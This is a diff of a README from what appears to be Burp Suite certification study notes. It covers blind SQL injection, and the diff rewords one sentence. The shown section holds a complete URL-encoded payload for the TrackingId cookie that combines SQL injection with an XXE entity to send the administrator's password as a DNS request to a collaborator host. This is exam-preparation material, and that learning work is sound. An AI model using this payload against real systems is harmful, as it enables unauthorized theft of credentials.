botesjuan/Burp-Suite-Certified-Practitioner-Exam-Study/README.md

 ### Blind SQLi

 >Target is vulnerable to Out of band data exfiltration using Blind SQL exploitation query.
 In this case the trackingID cookie.
-Below is combined SQL injection with basic XXE payloads.
+Below is combination of SQL injection and XXE payload to exploit the vulnerability and send administrator password as DNS request to the collaborator service.

 ```sql
 TrackingId=xxx'+UNION+SELECT+EXTRACTVALUE(xmltype('<%3fxml+version%3d"1.0"+encoding%3d"UTF-8"%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+"http%3a//'||(SELECT+password+FROM+users+WHERE+username%3d'administrator')||'.COLLABORATOR.NET/">+%25remote%3b]>'),'/l')+FROM+dual--